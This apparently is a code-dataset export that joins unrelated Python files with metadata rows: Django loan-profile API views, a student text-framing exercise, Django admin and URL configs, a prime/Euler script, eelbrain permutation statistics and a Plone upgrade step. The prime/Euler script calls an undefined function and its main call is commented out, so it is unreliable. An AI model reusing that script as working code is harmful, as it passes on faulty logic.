AddressV1, BorrowerV1, CoborrowerV1, EmploymentV1, ExpenseV1,
HoldingAssetV1, InsuranceAssetV1, VehicleAssetV1,
IncomeV1, LiabilityV1, LoanProfileV1,
)
from mismo_credit.models import CreditRequestResponse
from mismo_credit.tasks import start_credit_pull
from box.api_v1 import box_file_get
logger = logging.getLogger('sample.advisor_portal.views')
#
# Complex
#
class AdvisorLoanProfileV1ComplexView(AdvisorTokenAuthMixin,
AdvisorSetMixin,
viewsets.GenericViewSet,
viewsets.mixins.RetrieveModelMixin,
viewsets.mixins.CreateModelMixin,):
"""
This is a complex view, which accepts JSON which
describes loan profile and creating loan profile
with all related objects automatically.
"""
permission_classes = (IsAuthenticated, AllowAdvisorPermission,)
serializer_class = AdvisorLoanProfileV1ComplexSerializer
def create(self, request, *args, **kwargs):
"""
Overriding to do avoid incomplete data response,
returning ID will be enough.
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response({'id': serializer.data['id']}, status=status.HTTP_201_CREATED, headers=headers)
def retrieve(self, request, *args, **kwargs):
"""
Overriding to do a hack with related borrower and coborrower
objects.
"""
instance = self.get_object()
instance.borrower = instance.borrowers.last()
if instance.borrower:
instance.coborrower = instance.borrower.coborrower
serializer = self.get_serializer(instance)
return Response(serializer.data)
def get_queryset(self):
return self.request.user.loan_profilesV1.all()
advisor_loan_profile_complex_create_view = AdvisorLoanProfileV1ComplexView.as_view({'post': 'create'})
advisor_loan_profile_complex_view = AdvisorLoanProfileV1ComplexView.as_view({'get': 'retrieve'})
#
# RESTful
#
# Main
class AdvisorLoanProfileV1View(AdvisorTokenAuthMixin,
SelectForUpdateMixin,
AdvisorSetMixin,
NestedViewSetMixin,
viewsets.GenericViewSet,
viewsets.mixins.CreateModelMixin,
viewsets.mixins.UpdateModelMixin,
viewsets.mixins.ListModelMixin,
viewsets.mixins.RetrieveModelMixin,
viewsets.mixins.DestroyModelMixin):
"""
Base loan profile view.
"""
permission_classes = [IsAuthenticated, AllowAdvisorPermission, LoanProfileModifyOperationsPermission, ]
serializer_class = LoanProfileV1Serializer
filter_class = LoanProfileInProgressFilter
pagination_class = SmallLimitOffsetPagination
filter_backends = [filters.OrderingFilter] + api_settings.DEFAULT_FILTER_BACKENDS
ordering = ('-respa_triggered_within_last_week', '-updated')
ordering_fields = ('updated', 'borrowers__first_name', 'borrowers__last_name',)
qs_filter_kwargs = {
'is_active': True,
'encompass_sync_status__in': [
LoanProfileV1.ENCOMPASS_SYNCED,
LoanProfileV1.ENCOMPASS_NEVER_SYNCED,
LoanProfileV1.ENCOMPASS_SYNC_FAILED,
]
}
prefetch_list = [
Prefetch('new_property_address'),
Prefetch('borrowers'),
Prefetch('borrowers__mailing_address'),
Prefetch('borrowers__demographics'),
Prefetch('borrowers__realtor'),
Prefetch('borrowers__realtor__address'),
Prefetch('borrowers__previous_addresses'),
Prefetch('borrowers__previous_employment'),
Prefetch('borrowers__holding_assets'),
Prefetch('borrowers__vehicle_assets'),
Prefetch('borrowers__insurance_assets'),
Prefetch('borrowers__income'),
Prefetch('borrowers__expense'),
Prefetch(
'borrowers__coborrower',
queryset=CoborrowerV1.objects.filter(is_active=True)
),
Prefetch('borrowers__coborrower__mailing_address'),
Prefetch('borrowers__coborrower__demographics'),
Prefetch('borrowers__coborrower__realtor'),
Prefetch('borrowers__coborrower__realtor__address'),
Prefetch('borrowers__coborrower__previous_addresses'),
Prefetch('borrowers__coborrower__previous_employment'),
Prefetch('borrowers__coborrower__holding_assets'),
Prefetch('borrowers__coborrower__vehicle_assets'),
Prefetch('borrowers__coborrower__insurance_assets'),
Prefetch('borrowers__coborrower__income'),
Prefetch('borrowers__coborrower__expense'),
Prefetch('credit_request_responses'),
]
def _get_paginated_lp_ids(self):
"""
To reduce time on ordering and slicing,
it is faster to take needed IDs first
to avoid decryption, and then simply select
needed loan profiles.
Filtered and sorted ids are paginated in the
way we're paginating simple queryset.
"""
qs = self.request.user.loan_profilesV1.filter(
**self.qs_filter_kwargs
).values_list(
'id', flat=True
)
qs = self.annotate_queryset(qs)
qs = self.filter_queryset(qs)
return self.paginate_queryset(qs)
def annotate_queryset(self, qs):
today = datetime.date.today()
week_ago = today - datetime.timedelta(days=7)
is_respa_triggered_within_last_week_expr = Case(
When(Q(_respa_triggered=True) & Q(updated__gt=week_ago), then=Value(True)),
default=Value(False),
output_field=BooleanField()
)
return qs.annotate(respa_triggered_within_last_week=is_respa_triggered_within_last_week_expr)
def get_paginated_qs(self):
assert hasattr(self, '_get_paginated_lp_ids'), "%s has not '_get_paginated_lp_ids' attribute" % self
qs = self.request.user.loan_profilesV1.prefetch_related(
*self.prefetch_list
).filter(
id__in=self._get_paginated_lp_ids()
)
qs = self.annotate_queryset(qs)
qs = filters.OrderingFilter().filter_queryset(self.request, qs, self)
return qs
def get_queryset(self):
return self.request.user.loan_profilesV1.prefetch_related(
*self.prefetch_list
).filter(
**self.qs_filter_kwargs
)
def list(self, request, *args, **kwargs):
"""
Overriding method because we don't need to paginate
queryset since we selecting needed loan profiles by
using `self._get_paginated_lp_ids()`.
"""
assert hasattr(self, 'get_paginated_qs'), "%s has not 'get_paginated_qs' attribute" % self
queryset = self.get_paginated_qs()
serializer = self.get_serializer(queryset, many=True)
return self.get_paginated_response(serializer.data)
def perform_destroy(self, instance):
instance.is_active = False
instance.save()
# properties
@decorators.detail_route(methods=['post'], permission_classes=[IsAuthenticated, AllowAdvisorPermission])
def storage(self, *args, **kwargs):
instance = self.get_object()
instance.create_storage()
if not instance.storage:
return Response(status=status.HTTP_400_BAD_REQUEST)
data = {'id': instance.storage.box_folder_id}
return Response(data=data, status=status.HTTP_201_CREATED)
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def new_property_address(self, request, *args, **kwargs):
"""
Endpoint-property, new property address of loan profile entry.
"""
view = CommonAddressView
view.filters = {'loanprofilev1': kwargs['pk']}
view.related_set_attr = 'loanprofilev1_set'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
# actions
@decorators.detail_route(methods=['post'])
def los_guid(self, *args, **kwargs):
"""
POST for LOS GUID
"""
data = {}
instance = self.get_object()
if instance.encompass_sync_status not in [
LoanProfileV1.ENCOMPASS_NEVER_SYNCED,
LoanProfileV1.ENCOMPASS_SYNC_FAILED
]:
logger.warning('LOS-GUID-REQUEST-SYNC-BAD-STATUS %s', instance.guid)
data['request_submitted'] = False
return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
preflight_warnings = instance.encompass_sync_warnings()
if preflight_warnings:
data['request_submitted'] = False
data['warnings'] = preflight_warnings
logger.warning('LOS-GUID-PREFLIGHT-WARNINGS %s %s',
instance.guid, preflight_warnings)
return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
try:
submitted = instance.sync_to_encompass()
except Exception:
submitted = False
data['request_submitted'] = submitted
http_status = status.HTTP_201_CREATED if submitted else status.HTTP_400_BAD_REQUEST
return Response(data=data, status=http_status)
@decorators.detail_route(methods=['post'])
def confirm_demographics_questions(self, *args, **kwargs):
instance = self.get_object()
instance.is_demographics_questions_request_confirmed = True
instance.save()
return Response(status=status.HTTP_204_NO_CONTENT)
@decorators.detail_route(methods=['post'])
def credit_request(self, *args, **kwargs):
instance = self.get_object()
return start_credit_pull(instance.guid)
@decorators.detail_route(methods=['patch'])
def trigger_respa(self, *args, **kwargs):
instance = self.get_object()
data = instance.respa_criteria_for_advisor_portal()
http_status = status.HTTP_200_OK if instance.trigger_respa_for_advisor_portal() else status.HTTP_400_BAD_REQUEST
return Response(data=data, status=http_status)
@decorators.detail_route(methods=['get'])
def advisor_credit_pdf_view_url(self, *args, **kwargs):
instance = self.get_object()
summary = instance.find_valid_credit_report_summary()
if summary is None:
logging.exception("MISMO-CREDIT-SHARED-LINK-FAIL-NO-SUMMARY lp %s", instance.id)
data = {'url': ""}
resp_status = status.HTTP_404_NOT_FOUND
else:
#TODO: https://app.asana.com/0/26776562531082/310821218441711
box_file = box_file_get(summary.report_pdf_document.document_id)
shared_link = box_file.get_shared_link(access='company', allow_preview=True)
data = {'url': shared_link}
resp_status = status.HTTP_200_OK
return Response(data=data, status=resp_status)
@decorators.detail_route(methods=['post'])
def unlock_loan(self, *args, **kwargs):
instance = self.get_object()
if instance.lock_owner != instance.LOCK_OWNER_CHOICES.advisor:
instance.update_from_mortgage_profile()
instance.lock_owner = instance.LOCK_OWNER_CHOICES.advisor
instance.save()
data = {'lock_owner': instance.lock_owner}
return Response(data, status=status.HTTP_200_OK)
class AdvisorLoanProfileV1SyncInProgressView(AdvisorLoanProfileV1View):
"""
Loan profile view which represents LoanProfile's,
which are currently syncing with encompass.
"""
permission_classes = [IsAuthenticated, AllowAdvisorPermission, ]
serializer_class = LoanProfileV1Serializer
pagination_class = LargePagePagination
ordering = ('-updated')
qs_filter_kwargs = {
'is_active': True,
'encompass_sync_status__in': [
LoanProfileV1.ENCOMPASS_READY_TO_SYNC,
LoanProfileV1.ENCOMPASS_SYNC_IN_PROGRESS,
LoanProfileV1.ENCOMPASS_SYNC_FAILED,
]
}
advisor_loan_profile_v1_sync_in_progress_view = AdvisorLoanProfileV1SyncInProgressView.as_view({'get': 'list'})
# Credit Request
class AdvisorLoanProfileV1CreditRequestResponseView(
AdvisorTokenAuthMixin,
NestedViewSetMixin,
viewsets.ReadOnlyModelViewSet):
"""
Credit Report View
"""
permission_classes = [IsAuthenticated, AllowAdvisorPermission]
serializer_class = CreditRequestResponseSerializer
model = CreditRequestResponse
def get_queryset(self):
return self.filter_queryset_by_parents_lookups(
self.model.objects.all().prefetch_related(
Prefetch('credit_report_summary'),
Prefetch('credit_report_summary__credit_report_scores'),
)
)
# Borrower
class AdvisorLoanProfileV1BorrowerV1View(AdvisorLoanProfileV1BorrowerBaseView):
"""
Base borrower view.
"""
serializer_class = BorrowerV1Serializer
model = BorrowerV1
properties_mapping = {
'address': 'borrowerv1_address',
'mailing_address': 'borrowerv1_mailing_address',
'demographics': 'borrowerv1',
'employment': 'borrowerv1_employment',
'realtor': 'borrowerv1_realtor',
}
def perform_create(self, serializer):
loan_profile_id = self.kwargs['loan_profile']
try:
loan_profile = LoanProfileV1.objects.get(id=loan_profile_id)
except LoanProfileV1.DoesNotExist:
raise Http404('Loan profile with id "{}" does not exist'.format(loan_profile_id))
else:
serializer.save(loan_profile=loan_profile)
class BorrowerPreviousAddressesView(BorrowerResourcesMixin):
"""
Base view of borrower previous addresses.
"""
serializer_class = AddressV1Serializer
model = AddressV1
m2m_rel_attr = 'previous_addresses'
instance_count_maximum = 10
class BorrowerPreviousEmploymentsView(BorrowerResourcesMixin):
"""
Base view of borrower employment history.
"""
serializer_class = EmploymentV1Serializer
model = EmploymentV1
m2m_rel_attr = 'previous_employment'
instance_count_maximum = 10
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def address(self, request, *args, **kwargs):
"""
Endpoint-property, address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def company_address(self, request, *args, **kwargs):
"""
Endpoint-property, company address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_company_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_company_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class BorrowerHoldingAssetsView(HoldingAssetsOwnershipMixin, BorrowerResourcesMixin):
"""
Base view of borrower holding assets.
"""
serializer_class = HoldingAssetV1Serializer
model = HoldingAssetV1
m2m_rel_attr = 'holding_assets'
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def institution_address(self, request, *args, **kwargs):
"""
Endpoint-property, institution address of holding asset object.
"""
view = CommonAddressView
view.filters = {'holdingassetv1_institution_address': kwargs['pk']}
view.related_set_attr = 'holdingassetv1_institution_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class BorrowerVehicleAssetsView(BorrowerResourcesMixin):
"""
Base view of borrower vehicle assets.
"""
serializer_class = VehicleAssetV1Serializer
model = VehicleAssetV1
m2m_rel_attr = 'vehicle_assets'
class BorrowerInsuranceAssetsView(BorrowerResourcesMixin):
"""
Base view of borrower insurance assets.
"""
serializer_class = InsuranceAssetV1Serializer
model = InsuranceAssetV1
m2m_rel_attr = 'insurance_assets'
class BorrowerIncomesView(RestrictIncomesKindCreation, BorrowerResourcesMixin):
"""
Base view of borrower incomes.
"""
serializer_class = IncomeV1Serializer
model = IncomeV1
m2m_rel_attr = 'income'
class BorrowerExpensesView(RestrictKindCreation, BorrowerResourcesMixin):
"""
Base view of borrower expenses.
"""
serializer_class = ExpenseV1Serializer
model = ExpenseV1
m2m_rel_attr = 'expense'
class BorrowerLiabilitiesView(LiabilitiesRestrictionMixin, BorrowerResourcesMixin):
"""
Base view of borrower liabilities.
"""
serializer_class = LiabilityV1Serializer
model = LiabilityV1
m2m_rel_attr = 'liabilities'
# Coborrower
class AdvisorLoanProfileV1CoborrowerV1View(AdvisorLoanProfileV1BorrowerBaseView):
"""
Base borrower view.
"""
serializer_class = CoborrowerV1Serializer
model = CoborrowerV1
properties_mapping = {
'address': 'coborrowerv1_address',
'mailing_address': 'coborrowerv1_mailing_address',
'demographics': 'coborrowerv1',
'employment': 'coborrowerv1_employment',
'realtor': 'coborrowerv1_realtor',
}
@staticmethod
def _create_coborrower(borrower_id, serializer_instance):
try:
borrower = BorrowerV1.objects.get(id=borrower_id)
except BorrowerV1.DoesNotExist:
raise Http404('Borrower with id "{}" does not exist'.format(borrower_id))
else:
return serializer_instance.save(borrower=borrower)
@staticmethod
def _restore_coborrower(coborrower_obj, serializer_instance):
coborrower_obj.is_active = True
coborrower_obj.save()
serializer_instance.instance = coborrower_obj
return coborrower_obj
def perform_create(self, serializer):
borrower_id = self.kwargs['borrower']
try:
coborrower_obj = CoborrowerV1.objects.get(
borrower_id=borrower_id
)
except CoborrowerV1.DoesNotExist:
return self._create_coborrower(
borrower_id=borrower_id,
serializer_instance=serializer,
)
else:
return self._restore_coborrower(
coborrower_obj=coborrower_obj,
serializer_instance=serializer,
)
class CoborrowerPreviousAddressesView(CoborrowerResourcesMixin):
"""
Base view of coborrower previous addresses.
"""
serializer_class = AddressV1Serializer
model = AddressV1
m2m_rel_attr = 'previous_addresses'
instance_count_maximum = 10
class CoborrowerPreviousEmploymentsView(CoborrowerResourcesMixin):
"""
Base view of borrower employment history.
"""
serializer_class = EmploymentV1Serializer
model = EmploymentV1
m2m_rel_attr = 'previous_employment'
instance_count_maximum = 10
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def address(self, request, *args, **kwargs):
"""
Endpoint-property, address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def company_address(self, request, *args, **kwargs):
"""
Endpoint-property, company address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_company_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_company_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class CoborrowerHoldingAssetsView(HoldingAssetsOwnershipMixin, CoborrowerResourcesMixin):
"""
Base view of coborrower holding assets.
"""
serializer_class = HoldingAssetV1Serializer
model = HoldingAssetV1
m2m_rel_attr = 'holding_assets'
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def institution_address(self, request, *args, **kwargs):
"""
Endpoint-property, institution address of holding asset object.
"""
view = CommonAddressView
view.filters = {'holdingassetv1_institution_address': kwargs['pk']}
view.related_set_attr = 'holdingassetv1_institution_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class CoborrowerVehicleAssetsView(CoborrowerResourcesMixin):
"""
Base view of coborrower vehicle assets.
"""
serializer_class = VehicleAssetV1Serializer
model = VehicleAssetV1
m2m_rel_attr = 'vehicle_assets'
class CoborrowerInsuranceAssetsView(CoborrowerResourcesMixin):
"""
Base view of coborrower insurance assets.
"""
serializer_class = InsuranceAssetV1Serializer
model = InsuranceAssetV1
m2m_rel_attr = 'insurance_assets'
class CoborrowerIncomesView(RestrictIncomesKindCreation, CoborrowerResourcesMixin):
"""
Base view of coborrower incomes.
"""
serializer_class = IncomeV1Serializer
model = IncomeV1
m2m_rel_attr = 'income'
class CoborrowerExpensesView(RestrictKindCreation, CoborrowerResourcesMixin):
"""
Base view of coborrower expenses.
"""
serializer_class = ExpenseV1Serializer
model = ExpenseV1
m2m_rel_attr = 'expense'
class CoborrowerLiabilitiesView(LiabilitiesRestrictionMixin, CoborrowerResourcesMixin):
"""
Base view of borrower liabilities.
"""
serializer_class = LiabilityV1Serializer
model = LiabilityV1
m2m_rel_attr = 'liabilities'
| [
"[email protected]"
] | |
6038afd572bebeb6555821f05e0710b04f59d809 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_3/wllgar015/question3.py | 73caabd33916af860b5d886602e949a64214f59d | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,807 | py | #question 3
message=input("Enter the message:\n")
repeat=eval(input("Enter the message repeat count:\n"))
frame=eval(input("Enter the frame thickness:\n"))
def awesome(message, repeat, frame):
#Frame 1 is two characters greater than the input string
#Printing the string messages would work quite well.
#The repeat is how many lines of the top frame you will print.
#For example, repeat = 2, you will need to print 2 lines worth of frame
#at the top and two at the bottom. The 2 also reflects the lines you would need
#at the sides of the message itself.
if frame>0:
print("+","-"*(len(message)+2*frame),"+",sep="")
#counters help a lot ;)
count=1
dcount=1
#first loop for top frame
for i in range(frame-1): #it is frame-1 because we have printed one of the frames already. range(frame) will result in an extra unneccessary line.
print("|"*(count),"+",(len(message)+2*frame-2*dcount)*"-","+","|"*(count),sep="")
count+=1
dcount+=1
#second loop for message
for i in range(repeat):
print("|"*frame,message,"|"*frame)
#third loop for bottom frame which is the inverse of the top loop
count=frame-1
dcount=frame-1
#first loop for top frame
for i in range(frame-1): #it is frame-1 because we have printed one of the frames already. range(frame) will result in an extra unneccessary line.
print("|"*(count),"+",(len(message)+2*frame-2*dcount)*"-","+","|"*(count),sep="")
count-=1
dcount-=1
if frame>0:
print("+","-"*(len(message)+2*frame),"+",sep="")
awesome(message, repeat, frame)
| [
"[email protected]"
] | |
dc11c2a9a91ce330d48bdf58adb1905e8abc7e5f | 219b7903ad9b16acb4790f561952021e60f23abe | /giftexchange/admin.py | 671384fdd7635bf9f0761dcda08bdcce3a118864 | [] | no_license | astromitts/gifterator3000 | 40663de82526ef874c05d9385f53e6c2e3cb1625 | 64a8c420eb7b729c96861aa430f7f15cbe499d3d | refs/heads/master | 2023-01-28T06:47:09.110323 | 2020-12-04T01:43:53 | 2020-12-04T01:43:53 | 293,815,931 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from django.contrib import admin
from giftexchange.models import (
GiftExchange,
Participant,
AppUser,
ExchangeAssignment,
AppInvitation,
MagicLink
)
class ParticipantInline(admin.TabularInline):
model = Participant
fields = ['appuser']
class GiftExchangeAdmin(admin.ModelAdmin):
inlines = [
ParticipantInline,
]
list_display = ['title', 'date']
admin.site.register(AppUser)
admin.site.register(GiftExchange, GiftExchangeAdmin)
admin.site.register(Participant)
admin.site.register(ExchangeAssignment)
admin.site.register(AppInvitation)
admin.site.register(MagicLink)
| [
"[email protected]"
] | |
ed6deb8cf63883ec1dce2f0f037fd6877ffbaea1 | c8c9278ffb74da44789b310540693c66468b998c | /shop/urls.py | 87f494b760e5ec8a18cf0fe7c69c724930fc0633 | [] | no_license | danielspring-crypto/ekit | bdfcec4b2ce8e36bb9e692f7a825bfce0bbf4166 | 560f6fa5522e1cb4a2cf30325b2b1b07beceea3d | refs/heads/main | 2023-01-28T00:20:22.058791 | 2020-12-07T08:33:06 | 2020-12-07T08:33:06 | 319,253,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | from django.urls import path
from .import views
app_name = 'shop'
urlpatterns = [
path('', views.product_list, name='product_list'),
path('<slug:category_slug>/', views.product_list, name='product_list_by_category'),
path('<int:id>/<slug:slug>/', views.product_detail, name='product_detail'),
] | [
"[email protected]"
] | |
1f44b4b6d3e46f04b442fb65029b4ba093647a51 | 9ae936a9689832a5b22cd12998c5dc5047aee164 | /December_2020/December_2020/5_dec_2020/test.py | b410a47a0763433f3d18e060eca479c4c3ca3919 | [] | no_license | inderdevkumar/2020-Python-Projects | 218320335f352dc340877d1ef62b65605ce4ccfd | 210154d092021d8de5f30797af9ad8e193e3c68e | refs/heads/master | 2023-02-04T08:47:05.952342 | 2020-12-25T15:33:27 | 2020-12-25T15:33:27 | 322,878,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | #===================== Function Defination to check prime numbers=================================
from itertools import count, islice
primes = (n for n in count(2) if all(n % d for d in range(2, n)))
print("100th prime is %d" % next(islice(primes, 99, 100)))
#===================== Function Defination to Euler of n =================================
def pi_euler1(n):
count = 0
potentialprime = 3
prime_lists= [] #To store list of prime numbers
deno_list= [] #To store list of denominators which are closed to numerator
product= 1
while count < int(user_input_number):
if primetest(potentialprime) == True:
prime_lists.append(potentialprime) #Appending prime_lists
count += 1
potentialprime += 1
else:
potentialprime += 1
for value in prime_lists:
denominator_list= [i*4 for i in range(1,n)]
denominator= denominator_list[min(range(len(denominator_list)), key = lambda i: abs(denominator_list[i]-value))] #Finding the denominator which is closed to numerator
deno_list.append(denominator) #Appending deno_list
product= product*(value/denominator) #Finding product of expression
print("Prime Lists are: ", prime_lists)
print("Denominator Lists are: ", deno_list)
print(f"pi euler1 for {n} is: ", product*4) #To get the desired output. This calculation is performed
if __name__ == "__main__":
user_input_number= int(input("Enter the number of terms: "))
#pi_euler1(user_input_number)
| [
"[email protected]"
] | |
3ba42d75b8d7773ba4b0b673f1dbbbdaf2f8c9ec | 4a41223e8c8ab33d83c6f213692c6097bb96540d | /eelbrain/_stats/permutation.py | b4e3ec6a2a339c793de3982c33ed7a8d87dbda5e | [
"BSD-3-Clause"
] | permissive | rbaehr/Eelbrain | 33ceeee24533581ab3e7569c31e0f6a6c6dfcda1 | 6301dc256e351fdbb58bbe13ab48fde7bfcf192a | refs/heads/master | 2021-07-05T19:19:20.573231 | 2017-10-03T04:35:23 | 2017-10-03T04:35:23 | 104,907,464 | 0 | 0 | null | 2017-09-26T16:03:20 | 2017-09-26T16:03:20 | null | UTF-8 | Python | false | false | 6,505 | py | # Author: Christian Brodbeck <[email protected]>
from itertools import izip
from math import ceil
import random
import numpy as np
from .._data_obj import NDVar, Var
from .._utils import intervals
_YIELD_ORIGINAL = 0
# for testing purposes, yield original order instead of permutations
def _resample_params(N, samples):
"""Decide whether to do permutations or random resampling
Parameters
----------
N : int
Number of observations.
samples : int
``samples`` parameter (number of resampling iterations, or < 0 to
sample all permutations).
Returns
-------
actual_n_samples : int
Adapted number of resamplings that will be done.
samples_param : int
Samples parameter for the resample function (-1 to do all permutations,
otherwise same as n_samples).
"""
n_perm = 2 ** N
if n_perm - 1 <= samples:
samples = -1
if samples < 0:
n_samples = n_perm - 1
else:
n_samples = samples
return n_samples, samples
def permute_order(n, samples=10000, replacement=False, unit=None, seed=0):
"""Generator function to create indices to shuffle n items
Parameters
----------
n : int
Number of cases.
samples : int
Number of samples to yield. If < 0, all possible permutations are
performed.
replacement : bool
whether random samples should be drawn with replacement or without.
unit : categorial
Factor specifying unit of measurement (e.g. subject). If unit is
specified, resampling proceeds by first resampling the categories of
unit (with or without replacement) and then shuffling the values
within units (no replacement).
seed : None | int
Seed the random state of the relevant randomization module
(:mod:`random` or :mod:`numpy.random`) to make replication possible.
None to skip seeding (default 0).
Returns
-------
Iterator over index.
"""
n = int(n)
samples = int(samples)
if samples < 0:
err = "Complete permutation for resampling through reordering"
raise NotImplementedError(err)
if _YIELD_ORIGINAL:
original = np.arange(n)
for _ in xrange(samples):
yield original
return
if seed is not None:
np.random.seed(seed)
if unit is None:
if replacement:
for _ in xrange(samples):
yield np.random.randint(n, n)
else:
index = np.arange(n)
for _ in xrange(samples):
np.random.shuffle(index)
yield index
else:
if replacement:
raise NotImplementedError("Replacement and units")
else:
idx_orig = np.arange(n)
idx_perm = np.arange(n)
unit_idxs = [np.nonzero(unit == cell)[0] for cell in unit.cells]
for _ in xrange(samples):
for idx_ in unit_idxs:
v = idx_orig[idx_]
np.random.shuffle(v)
idx_perm[idx_] = v
yield idx_perm
def permute_sign_flip(n, samples=10000, seed=0, out=None):
"""Iterate over indices for ``samples`` permutations of the data
Parameters
----------
n : int
Number of cases.
samples : int
Number of samples to yield. If < 0, all possible permutations are
performed.
seed : None | int
Seed the random state of the :mod:`random` module to make replication
possible. None to skip seeding (default 0).
out : array of int8 (n,)
Buffer for the ``sign`` variable that is yielded in each iteration.
Yields
------
sign : array of int8 (n,)
Sign for each case (``1`` or ``-1``; ``sign`` is the same array object
but its content modified in every iteration).
"""
n = int(n)
if seed is not None:
random.seed(seed)
if out is None:
out = np.empty(n, np.int8)
else:
assert out.shape == (n,)
if n > 62: # Python 2 limit for xrange
if samples < 0:
raise NotImplementedError("All possibilities for more than 62 cases")
n_groups = ceil(n / 62.)
group_size = int(ceil(n / n_groups))
for _ in izip(*(permute_sign_flip(stop - start, samples, None,
out[start: stop]) for
start, stop in intervals(range(0, n, group_size) + [n]))):
yield out
return
# determine possible number of permutations
n_perm_possible = 2 ** n
if samples < 0:
# do all permutations
sample_sequences = xrange(1, n_perm_possible)
else:
# random resampling
sample_sequences = random.sample(xrange(1, n_perm_possible), samples)
for seq in sample_sequences:
out.fill(1)
for i in (i for i, s in enumerate(bin(seq)[-1:1:-1]) if s == '1'):
out[i] = -1
yield out
def resample(Y, samples=10000, replacement=False, unit=None, seed=0):
"""
Generator function to resample a dependent variable (Y) multiple times
Parameters
----------
Y : Var | NDVar
Variable which is to be resampled.
samples : int
Number of samples to yield. If < 0, all possible permutations are
performed.
replacement : bool
whether random samples should be drawn with replacement or without.
unit : categorial
Factor specifying unit of measurement (e.g. subject). If unit is
specified, resampling proceeds by first resampling the categories of
unit (with or without replacement) and then shuffling the values
within units (no replacement).
seed : None | int
Seed the random state of the relevant randomization module
(:mod:`random` or :mod:`numpy.random`) to make replication possible.
None to skip seeding (default 0).
Returns
-------
Iterator over Y_resampled. One copy of ``Y`` is made, and this copy is
yielded in each iteration with shuffled data.
"""
if isinstance(Y, Var):
pass
elif isinstance(Y, NDVar):
if not Y.has_case:
raise ValueError("Need NDVar with cases")
else:
raise TypeError("Need Var or NDVar")
out = Y.copy('{name}_resampled')
for index in permute_order(len(out), samples, replacement, unit, seed):
out.x[index] = Y.x
yield out
| [
"[email protected]"
] | |
01ebc7eb291e960ec42d8dc23255d61ec4d1af5c | 71a28d4bc1c0f32dc9185332ba2142ba823d3e53 | /core/urls.py | b9dba265ed605e2da34c2ae8c0cdaf56b88c141d | [] | no_license | ekeydar/train_stops_map | 51b1e3a86967851ea16f2e822867f881b91d24fe | acbc1a1a250ca6c3e7f5dde8932301bd4b67c96d | refs/heads/master | 2016-09-12T21:17:13.771035 | 2016-05-27T12:54:46 | 2016-05-27T12:54:46 | 59,438,833 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^stops/$', views.StopList.as_view(), name='stops'),
url(r'^stops/(?P<pk>\d+)/$', views.StopDetail.as_view(), name='stop'),
]
| [
"[email protected]"
] | |
ec6e6ad22ab5a96295739ceb492638e945ef5cdd | 2734b77a68f6d7e22e8b823418ad1c59fe1a34af | /opengever/dossier/upgrades/to4303.py | 0a0901f85458945e5a68304d5dff1c762b0b9236 | [] | no_license | 4teamwork/opengever.core | 5963660f5f131bc12fd0a5898f1d7c8f24a5e2b1 | a01bec6c00d203c21a1b0449f8d489d0033c02b7 | refs/heads/master | 2023-08-30T23:11:27.914905 | 2023-08-25T14:27:15 | 2023-08-25T14:27:15 | 9,788,097 | 19 | 8 | null | 2023-09-14T13:28:56 | 2013-05-01T08:28:16 | Python | UTF-8 | Python | false | false | 964 | py | from ftw.upgrade import ProgressLogger
from ftw.upgrade import UpgradeStep
from opengever.dossier.templatedossier import TemplateDossier
from plone import api
from zope.event import notify
from zope.lifecycleevent import ObjectModifiedEvent
class MigrateTemplateDossierClass(UpgradeStep):
def __call__(self):
self.setup_install_profile('profile-opengever.dossier.upgrades:4303')
self.migrate_template_dossiers()
def migrate_template_dossiers(self):
catalog = api.portal.get_tool('portal_catalog')
brains = catalog.unrestrictedSearchResults(
portal_type='opengever.dossier.templatedossier')
with ProgressLogger('Migrating templatedossier class', brains) as step:
for brain in brains:
self.migrate_object(brain.getObject())
step()
def migrate_object(self, obj):
self.migrate_class(obj, TemplateDossier)
notify(ObjectModifiedEvent(obj))
| [
"[email protected]"
] | |
